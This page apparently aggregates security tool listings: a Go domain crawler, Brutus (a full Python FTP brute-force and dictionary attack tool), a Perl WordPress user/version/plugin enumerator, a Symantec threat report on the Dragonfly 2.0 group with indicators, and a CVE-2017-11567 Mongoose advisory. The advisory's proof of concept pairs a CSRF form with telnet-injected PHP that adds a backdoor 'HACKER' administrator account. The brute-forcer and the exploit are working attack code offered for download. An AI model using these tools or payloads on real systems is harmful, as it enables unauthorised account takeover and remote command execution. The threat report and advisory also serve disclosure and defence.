dcrawl is a simple, but smart, multi-threaded web crawler for randomly gathering huge lists of unique domain names. How it works? dcrawl takes one site URL as input and detects all <a href=...> links in the site's body. Each found link is put into the queue. Successively, each queued link is crawled in the same way, branching out to more URLs found in links on each site's body. How smart crawling works: Branching out only to predefined number of links found per one hostname. Maximum number of allowed different hostnames per one domain (avoids subdomain crawling hell e.g. blogspot.com). Can be restarted with same list of domains - last saved domains are added to the URL queue. Crawls only sites that return text/html Content-Type in HEAD response. Retrieves site body of maximum 1MB size. Does not save inaccessible domains. How to run? go build dcrawl.go ./dcrawl -url http://wired.com -out ~/domain_lists/domains1.txt -t 8 Usage ___ __ __| _/________________ __ _ _| | / __ |/ ___\_ __ \__ \\ \/ \/ / | / /_/ \ \___| | \// __ \\ /| |__ \____ |\___ >__| (____ /\/\_/ |____/ \/ \/ \/ v.1.0 usage: dcrawl -url URL -out OUTPUT_FILE -t THREADS -ms int maximum different subdomains for one domain (def. 10) (default 10) -mu int maximum number of links to spider per hostname (def. 5) (default 5) -out string output file to save hostnames to -t int number of concurrent threads (def. 8) (default 8) -url string URL to start scraping from -v bool verbose (default false) Mirror: package main import ( "fmt" "io" "io/ioutil" "net/http" "net/url" "net" "strings" "regexp" "flag" "os" "bufio" "time" "golang.org/x/net/publicsuffix" ) const Version = "1.0" const BodyLimit = 1024*1024 const MaxQueuedUrls = 4096 const MaxVisitedUrls = 8192 const UserAgent = "dcrawl/1.0" var http_client *http.Client var ( start_url = flag.String("url", "", "URL to start scraping from") output_file = flag.String("out", "", "output file to save hostnames to") max_threads = flag.Int("t", 8, "number of concurrent threads (def. 8)") max_urls_per_domain = flag.Int("mu", 5, "maximum number of links to spider per hostname (def. 5)") max_subdomains = flag.Int("ms", 10, "maximum different subdomains for one domain (def. 10)") verbose = flag.Bool("v", false, "verbose (def. false)") ) type ParsedUrl struct { u string urls []string } func stringInArray(s string, sa []string) (bool) { for _, x := range sa { if x == s { return true } } return false } func get_html(u string) ([]byte, error) { req, err := http.NewRequest("HEAD", u, nil) if err != nil { return nil, err } req.Header.Set("User-Agent", UserAgent) resp, err := http_client.Do(req) if err != nil { return nil, err } if resp.StatusCode != http.StatusOK { return nil, fmt.Errorf("HTTP response %d", resp.StatusCode) } if _, ct_ok := resp.Header["Content-Type"]; ct_ok { ctypes := strings.Split(resp.Header["Content-Type"][0], ";") if !stringInArray("text/html", ctypes) { return nil, fmt.Errorf("URL is not 'text/html'") } } req.Method = "GET" resp, err = http_client.Do(req) if err != nil { return nil, err } defer resp.Body.Close() b, err := ioutil.ReadAll(io.LimitReader(resp.Body, BodyLimit)) // limit response reading to 1MB if err != nil { return nil, err } return b, nil } func find_all_urls(u string, b []byte) ([]string) { r, _ := regexp.Compile(`<a\s+(?:[^>]*?\s+)?href=["\']([^"\']*)`) urls := r.FindAllSubmatch(b,-1) var rurls []string ru, _ := regexp.Compile(`^(?:ftp|http|https):\/\/(?:[\w\.\-\+]+:{0,1}[\w\.\-\+]*@)?(?:[a-z0-9\-\.]+)(?::[0-9]+)?(?:\/|\/(?:[\w#!:\.\?\+=&amp;%@!\-\/\(\)]+)|\?(?:[\w#!:\.\?\+=&amp;%@!\-\/\(\)]+))?$`) for _, ua := range urls { if ru.Match(ua[1]) { rurls = append(rurls, string(ua[1])) } else if len(ua)>0 && len(ua[1])>0 && ua[1][0] == '/' { up, err := url.Parse(u) if err == nil { ur := up.Scheme + "://" + up.Host + string(ua[1]) if ru.MatchString(ur) { rurls = append(rurls, ur) } } } } return rurls } func grab_site_urls(u string) ([]string, error) { var ret []string b, err := get_html(u) if err == nil { ret = find_all_urls(u, b) } return ret, err } func process_urls(in <-chan string, out chan<- ParsedUrl) { for { var u string = <-in if *verbose { fmt.Printf("[->] %s\n", u) } urls, err := grab_site_urls(u) if err != nil { u = "" } out <- ParsedUrl{u, urls} } } func is_blacklisted(u string) (bool) { var blhosts []string = []string{ "google.com", ".google.", "facebook.com", "twitter.com", ".gov", "youtube.com", "wikipedia.org", "wikisource.org", "wikibooks.org", "deviantart.com", "wiktionary.org", "wikiquote.org", "wikiversity.org", "wikia.com", "deviantart.com", "blogspot.", "wordpress.com", "tumblr.com", "about.com", } for _, bl := range blhosts { if strings.Contains(u, bl) { return true } } return false } func create_http_client() *http.Client { var transport = &http.Transport{ Dial: (&net.Dialer{ Timeout: 10 * time.Second, }).Dial, TLSHandshakeTimeout: 5 * time.Second, DisableKeepAlives: true, } client := &http.Client{ Timeout: time.Second * 10, Transport: transport, } return client } func banner() { fmt.Println(` ___ __ `) fmt.Println(` __| _/________________ __ _ _| | `) fmt.Println(` / __ |/ ___\_ __ \__ \\ \/ \/ / | `) fmt.Println(`/ /_/ \ \___| | \// __ \\ /| |__`) fmt.Println(`\____ |\___ >__| (____ /\/\_/ |____/`) fmt.Println(` \/ \/ \/ v.` + Version) fmt.Println("") } func usage() { fmt.Printf("usage: dcrawl -url URL -out OUTPUT_FILE\n\n") } func init() { http_client = create_http_client() } func main() { banner() flag.Parse() if *start_url == "" || *output_file == "" { usage() return } fmt.Printf("[*] output file: %s\n", *output_file) fmt.Printf("[*] start URL: %s\n", *start_url) fmt.Printf("[*] max threads: %d\n", *max_threads) fmt.Printf("[*] max links: %d\n", *max_urls_per_domain) fmt.Printf("[*] max subd: %d\n", *max_subdomains) fmt.Printf("\n") vurls := make(map[string]bool) chosts := make(map[string]int) dhosts := make(map[string]bool) ldhosts := make(map[string]int) var qurls []string var thosts []string fo, err := os.OpenFile(*output_file, os.O_APPEND, 0666) if os.IsNotExist(err) { fo, err = os.Create(*output_file) } if err != nil { fmt.Fprintf(os.Stderr, "ERROR: can't open or create file '%s'", *output_file) return } defer fo.Close() scanner := bufio.NewScanner(fo) nd := 0 for scanner.Scan() { hn := scanner.Text() if hd, err := publicsuffix.EffectiveTLDPlusOne(hn); err == nil { ldhosts[hd] += 1 } dhosts[hn] = true thosts = append(thosts, hn) nd++ } fmt.Printf("[+] loaded %d domains\n\n", nd) w := bufio.NewWriter(fo) su := *start_url in_url := make(chan string) out_urls := make(chan ParsedUrl) for x := 0; x < *max_threads; x++ { go process_urls(in_url, out_urls) } tu := 1 ups, err := url.Parse(su) if err != nil { fmt.Fprintf(os.Stderr, "[-] ERROR: invalid start URL: %s\n", su) return } if _, sd_ok := dhosts[ups.Host]; sd_ok { fmt.Printf("[*] start URL detected in saved domains\n") fmt.Printf("[*] using last %d saved domains for crawling\n", *max_threads) for _, d := range thosts[len(thosts)-*max_threads:] { fmt.Printf("[+] adding: %s\n", ("http://" + d)) qurls = append(qurls, ("http://" + d)) } in_url <- qurls[0] } else { in_url <- su } for { var purl ParsedUrl = <-out_urls tu -= 1 if purl.u != "" { if du, err := url.Parse(purl.u); err == nil { if _, d_ok := dhosts[du.Host]; !d_ok { fmt.Printf("[%d] %s\n", len(dhosts), du.Host) dhosts[du.Host] = true fmt.Fprintf(w, "%s\n", du.Host) w.Flush() } } urls := purl.urls for _, u := range urls { // strip # out of url if exists u = strings.Split(u,"#")[0] up, err := url.Parse(u) if err == nil { h := up.Host hd := "" d_ok := true if hd, err = publicsuffix.EffectiveTLDPlusOne(h); err == nil { if n, ok := ldhosts[hd]; ok { if n >= *max_subdomains { d_ok = false } } } _, is_v := vurls[u] if !is_blacklisted(u) && chosts[h] < *max_urls_per_domain && !is_v && d_ok && len(qurls) < MaxQueuedUrls { vurls[u] = true chosts[h] += 1 if hd != "" { ldhosts[hd] += 1 } qurls = append(qurls, u) } } } } if len(qurls) == 0 { fmt.Fprintf(os.Stderr, "ERROR: ran out of queued urls!\n") return } // push more urls to channel for tu < *max_threads && len(qurls) > 0 { u := qurls[0] qurls = append(qurls[:0], qurls[1:]...) in_url <- u tu++ } if len(vurls) >= MaxVisitedUrls { vurls = make(map[string]bool) } } } License dcrawl was made by Kuba Gretzky from breakdev.org and released under the MIT license. Download dcrawl-master.zip Source

done.

Brutus is a small threaded python FTP brute-force and dictionary attack tool. It supports several brute-force parameters such as a custom character sets, password length, minimum password length, prefix, and postfix strings to passwords generated. Download brutus-0.3.py Usage: usage: brutus.py [-h] [-w WORDLIST] [-c CHARSET] [-l [LENGTH]] [-m [MINLENGTH]] [-r PREFIX] [-o POSTFIX] [-p [PAUSE]] [-t [THREADS]] [-v [VERBOSE]] host username positional arguments: host FTP host username username to crack optional arguments: -h, --help show this help message and exit -w WORDLIST, --wordlist WORDLIST wordlist of passwords -c CHARSET, --charset CHARSET character set for brute-force -l [LENGTH], --length [LENGTH] password length for brute-force -m [MINLENGTH], --minlength [MINLENGTH] Minimum password length -r PREFIX, --prefix PREFIX prefix each password for brute-force -o POSTFIX, --postfix POSTFIX postfix each password for brute-force -p [PAUSE], --pause [PAUSE] pause time between launching threads -t [THREADS], --threads [THREADS] num of threads -v [VERBOSE], --verbose [VERBOSE] verbose output Mirror: ################################################################################ # tool: Brutus - FTP Brute-Force/Dictionary Attack Tool # version: 0.3 # email: mrh@bushisecurity.com # www: bushisecurity.com/brutus/ ################################################################################ # MIT License # Copyright (c) 2017 Phillip Aaron # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal# # in the Software without restriction, including without limitation the rights# # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell# # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import argparse, sys, threading, time from datetime import datetime from itertools import chain, product from ftplib import FTP # Create some global variables class glob: pwd = False # Used for stopping attack when password found chrset = "" # Character set for brute-force prefix = "" # Prefix string postfix = "" # Postfix string length = 8 # Default lenth of password minlength = 5 # Default min length of password thrds = 10 # Defualt num of threads verb = False # Default value for verbose output pause = 0.01 # Default throttle time, 1 = one second cnt = 0 # Counting number of attempts # Iterable Method for brute-forcing a character set and length def bruteforce(charset, maxlength, minlength): return (''.join(candidate) for candidate in chain.from_iterable(product(charset, repeat=i) for i in range(minlength, maxlength + 1))) # Method for making ftp connections def crack(host, user, pwd): try: if glob.verb: # Check for verbose output print "[" + str(glob.cnt) + "] Trying: " + pwd.strip() ftp = FTP(host) # Create FTP object if ftp.login (user, pwd): # Check if true print "\nPassword for " + user + ": " + pwd.strip() print "==================================================" glob.pwd = True # Set global value print ftp.dir() # Display contents of root FTP ftp.quit() # Disconnect from FTP except Exception as err: pass # Ignore errors # Method wait for threads to complete def wait(threads): for thread in threads: thread.join() # Method for staging attack def main(args): try: start = datetime.now() # Time attack started print "\nAttacking FTP user [" + args.username + "] at [" + args.host + "]" print "==================================================" thrdCnt = 0;threads = [] # Local variables # Set global variables if args.pause:glob.pause = float(args.pause) if args.verbose:glob.verb = True if args.threads:glob.thrds = int(args.threads) if args.length:glob.length = int(args.length) if args.minlength:glob.minlength = int(args.minlength) if args.charset:glob.chrset = args.charset if args.prefix:glob.prefix = args.prefix if args.postfix:glob.postfix = args.postfix if args.charset == None: # Create charset from printable ascii range for char in range(37,127):glob.chrset += chr(char) # Brute force attack if args.wordlist == None: for pwd in bruteforce(glob.chrset, int(glob.length),int(glob.minlength)): # Launch brute-force if glob.pwd: break # Stop if password found if thrdCnt != args.threads: # Create threads until args.threads if args.prefix: pwd = str(args.prefix) + pwd if args.postfix: pwd += str(args.postfix) thread = threading.Thread(target=crack, args=(args.host,args.username,pwd,)) thread.start() threads.append(thread) thrdCnt += 1;glob.cnt+=1 time.sleep(glob.pause) # Set pause time else: # Wait for threads to complete wait(threads) thrdCnt = 0 threads = [] # Dictionary attack else: with open(args.wordlist) as fle: # Open wordlist for pwd in fle: # Loop through passwords if glob.pwd: break # Stop if password found if thrdCnt != args.threads: # Create threads until args.threads thread = threading.Thread(target=crack, args=(args.host,args.username,pwd,)) thread.start() threads.append(thread) thrdCnt +=1;glob.cnt+=1 time.sleep(glob.pause) # Set pause time else: wait(threads) # Wait for threads to complete thrdCnt = 0 threads = [] except KeyboardInterrupt: print "\nUser Cancelled Attack, stopping remaining threads....." wait(threads) # Wait for threads to complete sys.exit(0) # Kill app wait(threads) # Wait for threads to complete stop = datetime.now() print "==================================================" print "Attack Duration: " + str(stop - start) print "Attempts: " + str(glob.cnt) + "\n" if __name__ == "__main__": # Declare an argparse variable to handle application command line arguments parser = argparse.ArgumentParser() parser.add_argument("host", action="store", help="FTP host") parser.add_argument("username", action="store", help="username to crack") parser.add_argument("-w", "--wordlist", action="store", help="wordlist of passwords") parser.add_argument("-c", "--charset", action="store", help="character set for brute-force") parser.add_argument("-l", "--length", action="store", help="password length for brute-force", nargs='?', default=8, const=8, type=int) parser.add_argument("-m","--minlength", action="store", nargs='?', default=1, const=1, help="Minimum password length", type=int) parser.add_argument("-r","--prefix", action="store", help="prefix each password for brute-force") parser.add_argument("-o","--postfix", action="store", help="postfix each password for brute-force") parser.add_argument("-p", "--pause", action="store", help="pause time between launching threads", nargs='?', default=0.01, const=0.01) parser.add_argument("-t", "--threads", action="store", help="num of threads", nargs='?', default=10, const=10, type=int) parser.add_argument("-v", "--verbose", action="store", help="verbose output", nargs='?', default=False, const=True) # Show help if required arg not included if len(sys.argv[1:])==0: parser.print_help() parser.exit() args = parser.parse_args() if args.minlength != None or args.length != None: if args.minlength > args.length: print "\n** Argument Logic Error **" print "Minimum password length [-m "+str(args.minlength)+"] is greater than Password length [-l "+str(args.length)+"]\n" parser.print_help() parser.exit() main(args) Source

╔═══════════════════════════ ஜ۩☆۩ஜ ══════════════════════════╗ WP Grab Info v2 ╚═══════════════════════════ ஜ۩☆۩ஜ ══════════════════════════╝ Features: Detect User Detect Version Detect Theme Detect Plugins Usage: perl WP-Grab.pl -u http://website.com/ #!/usr/bin/perl #WordPress Grab Info #Coded By Mohamed Riahi 08/20/2017 #don't Change my Fucking Rights #[Detect User] #[Detect Version] #[Detect Theme] #[Detect Plugins] use LWP::UserAgent; use Term::ANSIColor; use HTTP::Request::Common qw(GET); use URI::URL; use Getopt::Long; $ua = LWP::UserAgent->new(keep_alive => 1); $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"); $ua->timeout (10); GetOptions( "u=s" => \$site, ); unless ($site) { help(); } if ($site) { banner(); } sub banner() { print q( ____ , /---.'.__ ____// '--.\ /.---' _______ \\ // /.------.\ \| .'/ ______ // ___ \ \ ||/|\ // _/_----.\__ |/ /.-.\ \ \:|< >|// _/.'..\ '--' // \'. | \'.|.'/ /_/ / \\ // \ \_\/" ' ~\-'.-' \\ // '-._| :H: |'-.__ \\ // {/'==='\}'-._\ || || \\ \| || \\ ' |/ \\ || WP Grab Info v2 || Coded BY Mohamed Riahi \\ ' ); print " [+] $site\n"; user(); Version(); Theme(); Plugin(); } sub help() { print " Usage: perl WP-Grab.pl -u http://website.com/"; } #################### GET USER #################### sub user(){ $user = $site . '/?author=1'; $getuser = $ua->get($user)->content; if($getuser =~/author\/(.*?)\//){ print " [-] User: $1\n"; }else{ print " [-] Can't Get Username\n"; } } #################### GET VERSION #################### sub Version(){ $getversion = $ua->get($site)->content; if($getversion =~/content="WordPress (.*?)"/) { print " [-] Version: $1\n"; }else{ print " [-] Can't Get Version\n"; } } #################### GET THEME #################### sub Theme(){ $getheme = $ua->get($site)->content; if($getheme =~/\/themes\/(.*?)\//){ print " [-] Theme: $1\n"; }else{ print " [-] Can't Get Theme\n"; } } #################### GET PLUGINs #################### sub Plugin(){ $getplugin = $ua->get($site)->content; my %seen; while($getplugin =~m/\/wp-content\/plugins\/(.*?)\//g){ $plu=$1; next if $seen{$plu}++; # already seen print " [-] Plugin: $plu \n"; } } Download mirror: WP-Grab-Info-master.zip Source: https://github.com/Moham3dRiahi/WP-Grab-Info

Resurgence in energy sector attacks, with the potential for sabotage, linked to re-emergence of Dragonfly cyber espionage group The energy sector in Europe and North America is being targeted by a new wave of cyber attacks that could provide attackers with the means to severely disrupt affected operations. The group behind these attacks is known as Dragonfly. The group has been in operation since at least 2011 but has re-emerged over the past two years from a quiet period following exposure by Symantec and a number of other researchers in 2014. This “Dragonfly 2.0” campaign, which appears to have begun in late 2015, shares tactics and tools used in earlier campaigns by the group. The energy sector has become an area of increased interest to cyber attackers over the past two years. Most notably, disruptions to Ukraine’s power system in 2015 and 2016 were attributed to a cyber attack and led to power outages affecting hundreds of thousands of people. In recent months, there have also been media reports of attempted attacks on the electricity grids in some European countries, as well as reports of companies that manage nuclear facilities in the U.S. being compromised by hackers. The Dragonfly group appears to be interested in both learning how energy facilities operate and also gaining access to operational systems themselves, to the extent that the group now potentially has the ability to sabotage or gain control of these systems should it decide to do so. Symantec customers are protected against the activities of the Dragonfly group. Figure 1. An outline of the Dragonfly group's activities in its most recent campaign Dragonfly 2.0 Symantec has evidence indicating that the Dragonfly 2.0 campaign has been underway since at least December 2015 and has identified a distinct increase in activity in 2017. Symantec has strong indications of attacker activity in organizations in the U.S., Turkey, and Switzerland, with traces of activity in organizations outside of these countries. The U.S. and Turkey were also among the countries targeted by Dragonfly in its earlier campaign, though the focus on organizations in Turkey does appear to have increased dramatically in this more recent campaign. As it did in its prior campaign between 2011 and 2014, Dragonfly 2.0 uses a variety of infection vectors in an effort to gain access to a victim’s network, including malicious emails, watering hole attacks, and Trojanized software. The earliest activity identified by Symantec in this renewed campaign was a malicious email campaign that sent emails disguised as an invitation to a New Year’s Eve party to targets in the energy sector in December 2015. The group conducted further targeted malicious email campaigns during 2016 and into 2017. The emails contained very specific content related to the energy sector, as well as some related to general business concerns. Once opened, the attached malicious document would attempt to leak victims’ network credentials to a server outside of the targeted organization. In July, Cisco blogged about email-based attacks targeting the energy sector using a toolkit called Phishery. Some of the emails sent in 2017 that were observed by Symantec were also using the Phishery toolkit (Trojan.Phisherly), to steal victims’ credentials via a template injection attack. This toolkit became generally available on GitHub in late 2016, As well as sending malicious emails, the attackers also used watering hole attacks to harvest network credentials, by compromising websites that were likely to be visited by those involved in the energy sector. The stolen credentials were then used in follow-up attacks against the target organizations. In one instance, after a victim visited one of the compromised servers, Backdoor.Goodor was installed on their machine via PowerShell 11 days later. Backdoor.Goodor provides the attackers with remote access to the victim’s machine. In 2014, Symantec observed the Dragonfly group compromise legitimate software in order to deliver malware to victims, a practice also employed in the earlier 2011 campaigns. In the 2016 and 2017 campaigns the group is using the evasion framework Shellter in order to develop Trojanized applications. In particular, Backdoor.Dorshel was delivered as a trojanized version of standard Windows applications. Symantec also has evidence to suggest that files masquerading as Flash updates may be used to install malicious backdoors onto target networks—perhaps by using social engineering to convince a victim they needed to download an update for their Flash player. Shortly after visiting specific URLs, a file named “install_flash_player.exe” was seen on victim computers, followed shortly by the Trojan.Karagany.B backdoor. Typically, the attackers will install one or two backdoors onto victim computers to give them remote access and allow them to install additional tools if necessary. Goodor, Karagany.B, and Dorshel are examples of backdoors used, along with Trojan.Heriplor. Strong links with earlier campaigns There are a number of indicators linking recent activity with earlier Dragonfly campaigns. In particular, the Heriplor and Karagany Trojans used in Dragonfly 2.0 were both also used in the earlier Dragonfly campaigns between 2011 and 2014. Trojan.Heriplor is a backdoor that appears to be exclusively used by Dragonfly, and is one of the strongest indications that the group that targeted the western energy sector between 2011 and 2014 is the same group that is behind the more recent attacks. This custom malware is not available on the black market, and has not been observed being used by any other known attack groups. It has only ever been seen being used in attacks against targets in the energy sector. Trojan.Karagany.B is an evolution of Trojan.Karagany, which was previously used by Dragonfly, and there are similarities in the commands, encryption, and code routines used by the two Trojans. Trojan.Karagny.B doesn’t appear to be widely available, and has been consistently observed being used in attacks against the energy sector. However, the earlier Trojan.Karagany was leaked on underground markets, so its use by Dragonfly is not necessarily exclusive. Feature Dragonfly (2013-2014) Dragonfly 2.0 (2015-2017) Link strength Backdoor.Oldrea Yes No None Trojan.Heriplor (Oldrea stage II) Yes Yes Strong Trojan.Karagany Yes Yes (Trojan.Karagany.B) Medium-Strong Trojan.Listrix (Karagany stage II) Yes Yes Medium-Strong “Western” energy sector targeted Yes Yes Medium Strategic website compromises Yes Yes Weak Phishing emails Yes Yes Weak Trojanized applications Yes Yes Weak Figure 2. Links between current and earlier Dragonfly cyber attack campaigns Potential for sabotage Sabotage attacks are typically preceded by an intelligence-gathering phase where attackers collect information about target networks and systems and acquire credentials that will be used in later campaigns. The most notable examples of this are Stuxnet and Shamoon, where previously stolen credentials were subsequently used to administer their destructive payloads. The original Dragonfly campaigns now appear to have been a more exploratory phase where the attackers were simply trying to gain access to the networks of targeted organizations. The Dragonfly 2.0 campaigns show how the attackers may be entering into a new phase, with recent campaigns potentially providing them with access to operational systems, access that could be used for more disruptive purposes in future. The most concerning evidence of this is in their use of screen captures. In one particular instance the attackers used a clear format for naming the screen capture files, [machine description and location].[organization name]. The string “cntrl” (control) is used in many of the machine descriptions, possibly indicating that these machines have access to operational systems. Clues or false flags? While Symantec cannot definitively determine Dragonfly’s origins, this is clearly an accomplished attack group. It is capable of compromising targeted organizations through a variety of methods; can steal credentials to traverse targeted networks; and has a range of malware tools available to it, some of which appear to have been custom developed. Dragonfly is a highly focused group, carrying out targeted attacks on energy sector targets since at least 2011, with a renewed ramping up of activity observed in the last year. Some of the group’s activity appears to be aimed at making it more difficult to determine who precisely is behind it: The attackers used more generally available malware and “living off the land” tools, such as administration tools like PowerShell, PsExec, and Bitsadmin, which may be part of a strategy to make attribution more difficult. The Phishery toolkit became available on Github in 2016, and a tool used by the group—Screenutil—also appears to use some code from CodeProject. The attackers also did not use any zero days. As with the group’s use of publicly available tools, this could be an attempt to deliberately thwart attribution, or it could indicate a lack of resources. Some code strings in the malware were in Russian. However, some were also in French, which indicates that one of these languages may be a false flag. Conflicting evidence and what appear to be attempts at misattribution make it difficult to definitively state where this attack group is based or who is behind it. What is clear is that Dragonfly is a highly experienced threat actor, capable of compromising numerous organizations, stealing information, and gaining access to key systems. What it plans to do with all this intelligence has yet to become clear, but its capabilities do extend to materially disrupting targeted organizations should it choose to do so. Protection Symantec customers are protected against Dragonfly activity, Symantec has also made efforts to notify identified targets of recent Dragonfly activity. Symantec has the following specific detections in place for the threats called out in this blog: Trojan.Phisherly Backdoor.Goodor Trojan.Karagany.B Backdoor.Dorshel Trojan.Heriplor Trojan.Listrix Trojan.Karagany Symantec has also developed a list of Indicators of Compromise to assist in identifying Dragonfly activity: Family MD5 Command & Control Backdoor.Dorshel b3b5d67f5bbf5a043f5bf5d079dbcb56 hxxp://103.41.177.69/A56WY Trojan.Karagany.B 1560f68403c5a41e96b28d3f882de7f1 hxxp://37.1.202.26/getimage/622622.jpg Trojan.Heriplor e02603178c8c47d198f7d34bcf2d68b8 Trojan.Listrix da9d8c78efe0c6c8be70e6b857400fb1 Hacktool.Credrix a4cf567f27f3b2f8b73ae15e2e487f00 Backdoor.Goodor 765fcd7588b1d94008975c4627c8feb6 Trojan.Phisherly 141e78d16456a072c9697454fc6d5f58 184.154.150.66 Screenutil db07e1740152e09610ea826655d27e8d Customers of the DeepSight Intelligence Managed Adversary and Threat Intelligence (MATI) service have previously received reporting on the Dragonfly 2.0 group, which included methods of detecting and thwarting the activities of this adversary. Best Practices Dragonfly relies heavily on stolen credentials to compromise a network. Important passwords, such as those with high privileges, should be at least 8-10 characters long (and preferably longer) and include a mixture of letters and numbers. Encourage users to avoid reusing the same passwords on multiple websites and sharing passwords with others should be forbidden. Delete unused credentials and profiles and limit the number of administrative-level profiles created. Employ two-factor authentication (such as Symantec VIP) to provide an additional layer of security, preventing any stolen credentials from being used by attackers. Emphasize multiple, overlapping, and mutually supportive defensive systems to guard against single point failures in any specific technology or protection method. This should include the deployment of regularly updated firewalls as well as gateway antivirus, intrusion detection or protection systems (IPS), website vulnerability with malware protection, and web security gateway solutions throughout the network. Implement and enforce a security policy whereby any sensitive data is encrypted at rest and in transit. Ensure that customer data is encrypted as well. This can help mitigate the damage of potential data leaks from within an organization. Implement SMB egress traffic filtering on perimeter devices to prevent SMB traffic leaving your network onto the internet. Educate employees on the dangers posed by spear-phishing emails, including exercising caution around emails from unfamiliar sources and opening attachments that haven’t been solicited. A full protection stack helps to defend against emailed threats, including Symantec Email Security.cloud, which can block email-borne threats, and Symantec Endpoint Protection, which can block malware on the endpoint. Symantec Messaging Gateway’s Disarm technology can also protect computers from threats by removing malicious content from attached documents before they even reach the user. Understanding the tools, techniques, and procedures (TTP) of adversaries through services like DeepSight Adversary Intelligence fuels effective defense from advanced adversaries like Dragonfly 2.0. Beyond technical understanding of the group, strategic intelligence that informs the motivation, capability, and likely next moves of the adversaries ensures more timely and effective decisions in proactively safeguarding your environment from these threats. Source

CVE-2017-11567 Mongoose Web Server v6.5 CSRF Command Execution ( apparitionsec @ gmail / hyp3rlinx ) [+] Credits: John Page AKA hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MONGOOSE-WEB-SERVER-v6.5-CSRF-COMMAND-EXECUTION.txt [+] ISR: apparitionSec Vendor: =============== www.cesanta.com Product: ================== Mongoose Web Server (Free Edition) Mongoose-free-6.5.exe Download: https://cesanta.com/binary.html Mongoose - GitHub's most popular embedded web server and multi-protocol networking library Mongoose Embedded Web Server Library - Mongoose is more than an embedded webserver. It is a multi-protocol embedded networking library with functions including TCP, HTTP client and server, WebSocket client and server, MQTT client and broker and much more. Vulnerability Type: =================== CSRF - Command Execution CVE Reference: ============== CVE-2017-11567 Security Issue: ================ Remote attackers who can lure a Mongoose web server user into clicking a malicious link or visit attacker controlled web page can execute system commands on the system hosting Mongoose server. However, IF Mongoose web server is installed as service then executing programs e.g. "calc.exe" may at times crash or fail to appear, but you may see it in Windows taskmgr.exe. Therefore, from my tests commands may become unstable when Mongoose is run as a service. When Mongoose is run standard mode attackers can potentially modify "Mongoose.conf" and create arbitrary files on server like .PHP etc. to point Mongoose to this as its new "index" file. Then you need to tell Mongoose its "access_log_file" is the new attacker generated file, after injecting commands into Mongoose web servers log file that will get excuted when log file is later requested. This vulnerability requires CGI interpreter to be already set or some information about the target is known like the CGI path and language "pl,php,cgi" used, so when we can set to use correct programming language when file is created during initial CRSF attack. Note: If running commands with arguments, we have to use "\t" tab chars as using space will break our TELNET based code injection to the server log. e.g. GET<?php exec("cmd.exe\t/c\tnet\tuser\tHACKER\tabc123\t/add");?> HTTP/1.1 OR just TELNET to Mongoose web server, inject arbitrary commands, then call exec by making another TELNET HTTP GET. After Command Injection "Mongoose.conf" will be: # Mongoose web server configuration file. # For detailed description of every option, visit # https://github.com/cesanta/Mongoose # Lines starting with '#' and empty lines are ignored. # To make a change, remove leading '#', modify option's value, # save this file and then restart Mongoose. # access_control_list access_log_file C:\Mongoose.access.php <======= BOOM # auth_domain mydomain.com cgi_interpreter c:\xampp\php\php.exe <====== MUST BE SET # cgi_pattern **.cgi$|**.pl$|**.php$ # dav_auth_file # dav_root # debug 0 document_root C:\ # enable_directory_listing yes # error_log_file # extra_headers # extra_mime_types # global_auth_file # hide_files_patterns # hexdump_file index_files Mongoose.access.php <======== BOOM # listening_port 8080 # run_as_user # ssi_pattern **.shtml$|**.shtm$ # ssl_certificate # ssl_ca_certificate # start_browser yes # url_rewrites Mongoose log file Command Inject to create backdoor. ----------------------------------------------------------- 2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 - 2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 - 2017-07-24 03:12:30 - 127.0.0.1 - GET<?php exec("cmd.exe\t/c\tnet\tuser\tHACKER\tabc123\t/add");?> 400 0 - 2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 - 2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin?get_settings 200 4294967295 http://127.0.0.1:8080/__mg_admin 2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin?get_cfg_file_status 200 4294967295 http://127.0.0.1:8080/__mg_admin 2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /favicon.ico 404 0 - Tested Windows 7. Exploit/POC: ============= 1) add backdoor account POC. <form action="http://127.0.0.1:8080/__mg_admin?save"; method="post"> <input type="hidden" name="access_log_file" value="Mongoose.access.php"> <input type="hidden" name="cgi_pattern" value="**.cgi$|**.pl$|**.php"> <input type="hidden" name="index_files" value="Mongoose.access.php"> <input type="hidden" name="cgi_interpreter" value="c:\xampp\php\php.exe"> <script>document.forms[0].submit()</script> </form> 2) TELNET x.x.x.x 8080 GET<?php exec("cmd.exe\t/c\tnet\tuser\tHACKER\tabc123\t/add");?> HTTP/1.1 Enter Enter TELNET x.x.x.x 8080 GET / HTTP/1.1 Enter Enter Done, backdoor added! ==================== 1) run calc.exe POC. <form action="http://127.0.0.1:8080/__mg_admin?save"; method="post"> <input type="hidden" name="cgi_pattern" value="**.cgi$|**.pl$|**.exe"> <input type="hidden" name="index_files" value="../../../../../../Windows/system32/calc.exe"> <input type="hidden" name="cgi_interpreter" value="../../../../../../Windows/system32/calc.exe"> <script>document.forms[0].submit()</script> </form> 2) TELNET x.x.x.x 8080 GET / HTTP/1.1 Enter Enter Network Access: =============== Remote Severity: ========= Medium 